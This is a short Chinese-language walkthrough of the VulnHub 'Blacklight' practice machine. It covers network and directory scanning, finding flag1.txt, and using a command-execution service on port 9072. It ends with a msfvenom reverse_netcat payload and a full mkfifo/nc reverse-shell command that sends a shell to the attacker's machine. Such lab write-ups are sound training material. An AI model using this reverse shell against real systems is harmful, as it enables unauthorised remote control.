项目地址
http://download.vulnhub.com/blacklight/BLACKLIGHT.ova
靶机渗透
网络选择桥接模式,使用命令
arp-scan -l
nmap 192.168.0.130
使用dirb遍历网站目录结构,命令dirb 192.168.0.130
发现其中一个文件,查看该文件发现里面记录了两个文件名称flag1.txt
和blacklight.dict
访问两个文件,发现blacklight.dict
是一个密码本,但是该靶机并没有开启22端口,也不能进行ssh枚举连接,另一个文件flag1.txt
给了一串字符和一个句话,说什么 9072,答案(秘密)在靶机里
可能是告诉我们靶机的一个端口,使用nmap 192.168.0.130 -p 9072
查看端口是否开放,发现该端口是打开的
使用nc 192.168.0.130 9072
尝试与靶机建立会话,连接成功后告诉我们输入.help
查看帮助命令,发现其可以使用.exec <cmd>
执行命令
使用命令msfvenom -p cmd/unix/reverse_netcat lhost=192.168.0.109 lport=4444 R
获得一个简易免杀语句,然后输入命令
.exec `mkfifo /tmp/bujhg; nc 192.168.0.109 4444 0</tmp/bujhg | /bin/sh >/tmp/bujhg 2>&1; rm /tmp/bujhg`